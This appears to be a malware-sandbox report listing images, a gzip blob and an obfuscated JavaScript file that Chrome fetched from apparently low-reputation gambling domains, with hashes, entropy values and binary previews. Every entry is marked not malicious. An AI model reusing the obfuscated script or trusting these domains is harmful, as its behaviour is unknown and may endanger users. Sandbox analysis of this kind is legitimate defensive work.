                                                                                                                                                          SHA-512:028AC4100EC0464F40CAAE289AC11AF00D394A4A159271335CEE525E830C11FC148F8519011B203167FEA2EF448F36541A505EB7ED6B4F1F9C0A793990688998
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/live_astar.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....pHYs.................IDATh..y.%Wu..s..u.^.{..gl..1`......`....H.b...@Y.d.@..M.X.... ..@..`d;.CXL....oxf.0...=..~..{O.x6..!`C"u.'=...z.[...9*13.?I......*.J.*.J.*.J.*.J.*.J.*.J.*.J.....Dq.....#....]..@.t........O_...".....!..j.0?8.j...S..B..&......0.L....k.A?;.po...]O..Z..c=N..#...j.-3....j..M...'>........]....+....8..../..z...!..3...{......m....}. ......<3....xM..,-..=.x.1..".b. .0...t..d.[U.*......B..+#|.$.hFeP,5.e...E...+..A..ciAY+".8..XU(.....A.5b..X?....Yx..!.......98.k....#.p.Xp..p..*..D@4.....Km..Q(F.@].H3.X. D.......\V..Hc.....h..4/...-.#k.*z.....~P.n.;ya........K..Z.N.@p...,.[.,9.....!.6!...n....a..>..8.=k.\].u....a.....NR_.....A.x?y;..=m......<.y.d..........f..o7.....WU*."`......e.~..?..a....K..dT..jx?...q..)ay.=S.<..L.>e.s..[...,.YBQ..8..j9&...r.. ........&.>.).HS*.VT..S....!.........`....-Ne.&."v~^.'d..<.m..o9..0.%.x.]~..N.R..CT...,.`k...z.4.v9m..R.)e4.a.....@...'....&..yUK.;.f..........R..|1~.....E
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 168x168, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6871
                                                                                                                                                          Entropy (8bit):7.872376472792791
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:p7FikLUR+6X7MCy5nSb1jSG99DX8yclWGo2yscY8:pfA3+gSGjX25+Y8
                                                                                                                                                          MD5:99BE4BFE275809D4E436B77C991B1381
                                                                                                                                                          SHA1:54EADEE77394EB62CCF377AE68D9F49ACB5B6785
                                                                                                                                                          SHA-256:4CA35131972ACDF420B94F0D64A5A0F504EB5A7B0E6FB7B8B467916A12AAE37D
                                                                                                                                                          SHA-512:452A79B02619ED5C1E4F81FC5A4A209CB8A11D03AADB1841AE9BE18FBCA088652CDB54340329C1BF57771ABFB02FFED4BF75B61F4DF96866B7F2358C36AE75A3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/zh_CN/mobileTopic/images/special_3.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......<...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmpMM:InstanceID="xmp.iid:D4BE92C0D83711E8AF8CAD9701B14EA4" xmpMM:DocumentID="xmp.did:D4BE92C1D83711E8AF8CAD9701B14EA4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D4BE92BED83711E8AF8CAD9701B14EA4" stRef:documentID="xmp.did:D4BE92BFD83711E8AF8CAD9701B14EA4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 89 x 25, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5720
                                                                                                                                                          Entropy (8bit):7.950098184688683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:8ZWNiDb5rpy5zWDcCi8ECZ+bbPCxnAKRhY4OW9KsxP3+vOi6wAth2f/jTRWWXM:8qipc5zWDcCi8jwGAF41hxGvOif82jTQ
                                                                                                                                                          MD5:350A70A8D40570B7421220A471E01D59
                                                                                                                                                          SHA1:5228B99BC7BC540CBDD1FB6B08D1558F816638B6
                                                                                                                                                          SHA-256:FC56EF5478D4F289BC0BE76D5D32464D29BE3F9955F074DD4D944D19E1A50AF0
                                                                                                                                                          SHA-512:101DE2166B937E235A082A569578916478F7BBC1FBD243699AF27EBC6404540C6A57C6424BBAA7F736DD0D1DE5DA7E1CD582F369FE2E05EC62DFB51E30CB6D5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/footer/logo_CG_normal.png
                                                                                                                                                          Preview:.PNG........IHDR...Y.........ZS......IDAThC.Yy...?....Y..E.......nD....[.mLDQ...2K.>]]..U].3..t.,..T.%*yY4...".....n.....l].].W.c..........u.Y.....s.=.`...G.KJ....B..bB...=.....N.g.ny.iR....8_....2\VZZJ&.z..@d.S.Js...r......$.........}.4L.d.`@.!.../z....C.HM......k..?-_....Yk.NT..F....7...n...H4.U>>..r......].zn...h:UR.....KHr.b/.....[.._.ZwG...GC..T.....L....$8H..A..uf...;.X..9.....,...p8\R<~.^....=aF..<.P).....Y.2.<k.j.S..wc....B.....c...{-..N.@z:...@../..65~8...F...p.l.s./.q.,OB....".t...Q...w.xt...,..[W<.{.@......8......3.s......oJ.H.A.M...a\.R.I ...m.....?.?.....o..gE{:..qm.~D`l.B .....S.z..!y....HE;0.....|..1.w^".v. .Z.`p....X.Q.;.0V...@..RT M*,.......L]..%.]....a.....2|1Q3..A....Mk....w..b.$p..._..,0..v......)..p.q.n.I..P7..._^.....rQ.pb.E..2-.P.....v(......mt....L.&..T.>...| ..BF....w....l.5..P........v..^...%..S)...9..u.&..K....8...V.f..TW..F......1.X..=........|1.3..}.Q..J...a...1.P..Cp.^....`t..V.....qg.w...NG...F...r...z.Z..&..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/ocs/cc.png?1717972886701
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/cc.png?r=7134333617
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):46607
                                                                                                                                                          Entropy (8bit):7.99140100465862
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:BM4cNgwFQjgPbCqx/ahKS/WuPtjrPWHngi4TWixG78wR8HphWMxxjYicPNp:BM9AgPlx/qK1mRrunMLwR8HphWaFYPz
                                                                                                                                                          MD5:A976A07350A0DD0B43036984342E83CD
                                                                                                                                                          SHA1:EAD048077E93A14334951EB3D85FD7370132082F
                                                                                                                                                          SHA-256:7203E735E1F86617CC19B35D0005EFFA72D7472E1B72785BF4E23F920FA1061F
                                                                                                                                                          SHA-512:3839E4D3FD7496534CEF020A0949F081E0251117C7AF7DCCBDC6D8C77AB67C18F9647D920A0AF3DD25F6A2803074D2FE93A1F99779DD4D77A315E6663AE909E5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sports/s.png
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:621F9728CDEB11E99621DC2C95DD46DC" xmpMM:DocumentID="xmp.did:621F9729CDEB11E99621DC2C95DD46DC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:621F9726CDEB11E99621DC2C95DD46DC" stRef:documentID="xmp.did:621F9727CDEB11E99621DC2C95DD46DC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.,q.....IDATx...|..u.~.....Eo.....^D..dI.lU..{..g;N.....'~.K....bK..^%Y...."6.`...D......w.]."..V.9yq........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (7648), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7648
                                                                                                                                                          Entropy (8bit):5.937033305798227
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VSu4qFxjbfaFyVcN5iHKxeNfibCdutZe2BVokOYnCPpLWSNtR:VX4q/r6t5iPfiOA72PR3n
                                                                                                                                                          MD5:57648F1C0BE56658A512181CD40C0958
                                                                                                                                                          SHA1:19178FEDF0FA81538C378E1E4DD944F6618595F5
                                                                                                                                                          SHA-256:2B536CD8BAE2F58B12A4BB816886E866EEFB2B9DFBB0F9399DCF9019184CF22B
                                                                                                                                                          SHA-512:92B79D9E3BBCCC222E3007D75CB845D60E798F08B7B0CACE50A7278CB8AFE4CDB3B6C983A30BFC5ED01E108366E763D8128E6DCF43B6F4489A6CB78D5B284E77
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/noticeBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgBYAaQgZgEYBdYgbwCIKA2XFegLgDMBXNGAFwCW6TP2IhiggJS1+AOhAAPCCgBO/JAF5BmeoQCcnAKr0pmChSkBfYvVwA5MAHkOPPkJFiQMm/QDsAGqKAAquvALCaKLiPrb6fgj6Ye6R0RLSDNxIIAAESPyqggL0ANxOYABWIAJyACYgnIJoIMGqKBAg6gCemBL0APr9IEgAsii13AA2IPR0AG5Qk9wg7ACEAAxWUiULqjlo2rrrMBCcpsRQh/TrgsEAFudagnJRUFLEKFfMrOeqmrS1KD8KBccIeKIyVQgfjcVRoWjAJrNVRIdj0ehWGwwKFAkC1UEpEQyXY5fiafh3QRIcSaRFoWooYByADKAGkAJL2Eo6RgAQQqAHNTLo5AB6egAahAEvooqa9UUcgqSFMcgpICibgiIm8sjkdORWhA+qRnSQWxs3AggP4eIJ2ohskpSDkABJmop+AAVIpwTBa8GYYlQPZkukMplsznc3S1CoVXnC+hiyX8GWiyaCAV3DSZ+qqJUqqRqu4a/1g1L8GRIIO6ADEBs6qsz2f4zLznUwtEEtoAtuwAKwXbj8FAAdUEtQpawoxCQHbGcxWs/nk5AIxDAqa7BIMCQSAAolAkE0BWiQMeZuJj6e0ZnmiHZkgOnayOt1sRoFkVrgQGRh6OawfpMKDtEBxBwCAXStMMqKrLOMDoAUKCTHBs4QFCcwABL8L2kxorMHr8DheEEcQ6j4fBFyAhAQhLlhIBZjmM7EEu6hFIs4FsUIMCLAxTH8OwFBkEOcxenc3C9mAE5TncQnvsQFKSWA7J9kJxAwLCUJoPwwRQAKnTBCgJ7gmivaTrU0yzOg7ZrqoAAyKBQPiAapNWtb0A2pqqKqUK9igS4AMKTMeNb0DAzIALSUrU9RoKYmLWElmIaf82n5vagbBqG5LOjS8iutiF62ge0y9hqYiCOScj9NkkycDVM
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=12, height=89, bps=158, PhotometricIntepretation=RGB, orientation=upper-left, width=1919], baseline, precision 8, 1919x89, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):51842
                                                                                                                                                          Entropy (8bit):7.809297693551145
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:FqPj63h9fmW25PTnKtzRb3CVGaYXx0wGrWRdbc7+r2DqH4x+Xx/:bOW+7obSVuaFK5wB2Hfx/
                                                                                                                                                          MD5:77F3B6F6BFBD296CE86682072B5D4A55
                                                                                                                                                          SHA1:E2E7D669B2A75BE4993EBA4280468200FC69B692
                                                                                                                                                          SHA-256:7130D24684B78E661202EA5C7EF3C2D522C4788D04F9580F22DFBA5F812E788D
                                                                                                                                                          SHA-512:C735466F1DE1D604BE00B6AF84BEDE03574CBB7A85406E5D60694101FE6B4E16C04E3D7F80C347BF2C1CD460DEB1AA593CDBCB5940DC4070904750269B7DECFB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/top/img_bg2.jpg
                                                                                                                                                          Preview:.....aExif..II*...........................Y...........................................................................(...........1...".......2...........i...........$..............'.......'..Adobe Photoshop CC 2015 (Windows).2018:01:12 18:53:27.............0221................................Y...............................r...........z...(.......................................H.......H.............Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..}l..w..7......4.u%...z1n_..).z{].....z.[.......3...iXI%....f..c..Xv.G].#
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 18388
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4084
                                                                                                                                                          Entropy (8bit):7.94569233466241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mwcWOzIzqP0Drv6oQckG8NF/xiWqpvCkxpR:RwIzXscRqRxiWkTpR
                                                                                                                                                          MD5:106BA6DD5A7918BDB0DD73A4594C5684
                                                                                                                                                          SHA1:5DA4B04A3D47B087CDC723C63606CCD53D61C52F
                                                                                                                                                          SHA-256:4BE1B19DD11804094ACA2A4C9E62C22AFD21B14EAFFCA0874E87A3441BE04966
                                                                                                                                                          SHA-512:1B1589144CCB52B8F53C0D6862E626808F70748B3F4E3DCB950F985A8C2200E7CE7FAD056AC6645FAD84063178DC517FAAAC7ADC2EF18BA20D19666C8CA3833E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:...........WKo.6.>o~E.^c.....E.=t...........E.....z.R..zk` ...7.of......J..=..*E.r].=t..(..R..o.b.m.%.N.....&=|8.C/.I ....N.....P......_.o....7._P..N...=........=......$..*..jc...^..........._.>....f..s...u).}".H......t}:].YO^+.C..K?=....p.CD=._......%.{.Y'Y(.4..'..K...aV..]!6....Y!.*.e.EY.K./(.-h.t.._.\.f....C..=..K.~rV6......i..h.x~.{2U.G.....T..n..j.~.^:........s..U`N]}j1.T%....)7.u.6G..y8.....@.H..zz|...y"...DZTJ.}.'d.I......eQ.~..X*..Q.>.NO...avi......gA.V.O.\...O...."K<..%........,....w.V&...gA.k..L.K....!3....y..Y.WG...d;l0...go_.HxU.......b.|..(.f^.JE....=w<..i...q~%.<..G}.r..3..U.e)..;...DX.-.r.g.3....aKB.I..Xhy.R.b......W.......K....:p......y8.a...%`..n..E`e..JyA..R`lwK...........,....u=.l..>f. .~....._....z...7.Nwow..s..S..s....,..m....{+<h.....v/.'.%a...dd....Z.Pq..0.`~Cg.wx:.".-@0.I>..a.S.A.PLL.s.....309......)..:......s.X.D....w#h.[m.m.y....0.% .Iv.a+..D.. ..N....S../.BM..........gd..2.s.5..v..lg.c.;.....v..`...;.1_..C...2..0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18
                                                                                                                                                          Entropy (8bit):3.4193819456463714
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:3W1n:3W1n
                                                                                                                                                          MD5:65A44FC97C89C6A6EF5AC16143DBFCEC
                                                                                                                                                          SHA1:448ECF2AAFC8FB1D52785E0096DDADE283C852AC
                                                                                                                                                          SHA-256:65F6E0D0B6BF1DE78E8640E5B6497340AA3CDD548AE716CA4EE6D1F0F1014096
                                                                                                                                                          SHA-512:571BC83E5CBCC5AC97A635BF8060C36B24B2EB3601928BF0DFA901478256AEC495044FF1E7E4D89F8954923FDB1C34F0D56FDB772EFBF7C9450FFD4CC2731616
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:request-empty-777.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/cc.png?1717972895188
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2262
                                                                                                                                                          Entropy (8bit):7.396133910532563
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:0AinNuiC2S/pteJ39cmUyqNeLRLe6zkA9AErm4HGMdHI72:yN78tqGqe6lLrm4HfdoS
                                                                                                                                                          MD5:F7A087B074687409D612C6DC2379CA1A
                                                                                                                                                          SHA1:1FE52BBF3083E98BC213D55AD8387743862C78A3
                                                                                                                                                          SHA-256:774FEC43A7626E6268780259BE97FE1114F8DB7D6551CB07BF9FA5C809C09391
                                                                                                                                                          SHA-512:9B011F5DD2437BDBABEFBB822A9003C08EEC4D8B4962F7F5EBD7F45EF45E8B684C6BC6649490D0476CBC94FA3836299B3DB4C3D4A965EFAB760118CBE4AFD2B4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/nav/icon-s/game_mg.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:66A4D9BBA3A311E9916ECC60D2158905" xmpMM:InstanceID="xmp.iid:66A4D9BAA3A311E9916ECC60D2158905" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E3DAAB8FF77711E7B122FFEE1F631D5E" stRef:documentID="xmp.did:E3DAAB90F77711E7B122FFEE1F631D5E"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1920x2080, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):791405
                                                                                                                                                          Entropy (8bit):7.972826850642288
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:6oKPGThMhWTLyT6Mvn6L6PvHkCqPYYGhXhXaaaQ+uB0smwEzRlMt0:2mMhyLIvHPvExODDoPdCG
                                                                                                                                                          MD5:374AF939A7241CD85A5D84A2C0EFEDD0
                                                                                                                                                          SHA1:A85E3D060EE7483C8AF7A17E28E928EA32742ADA
                                                                                                                                                          SHA-256:D7A7A07BB936E5E3CFA0B190996A91087294288292519D313B1CD670F6C1C354
                                                                                                                                                          SHA-512:DB40DE6C9D68E58156B981A502E7AB739B08CDAC77963E61F3C2191769A7993D8D51B72F27C40E5A268F532A132AA5BFBC985A2E501E2E6D542C60119465128A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/img_bg.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:A24C38C8F39411E7995DD1277CDBF179" xmpMM:DocumentID="xmp.did:A24C38C9F39411E7995DD1277CDBF179"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A24C38C6F39411E7995DD1277CDBF179" stRef:documentID="xmp.did:A24C38C7F39411E7995DD1277CDBF179"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):33833
                                                                                                                                                          Entropy (8bit):7.989977694517762
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:mA0k5P9lbfIBdJaSzZ+4w27OaIk03bf2ARLt8NY1jFqp:/TRIBdFZ+4w2SaIk0rRRh8uCp
                                                                                                                                                          MD5:825032D5B0752E042AF6BD51B0C67D22
                                                                                                                                                          SHA1:AEF2865442CF64F4BE4A7495EAC941C02DBD37D1
                                                                                                                                                          SHA-256:F63373242AB3B3354B30C8DC0DFBAD2FD05671734727C7E53FC81FADA4E8A47F
                                                                                                                                                          SHA-512:E9DE9860C314464AA5E077F60E952050557B1E494A0CC085C495A65029453A0215DA9CA6961456197C87F8EADF864214E9A01B1EB3F609B6F533D5E45E30BBEF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/fish/01.png
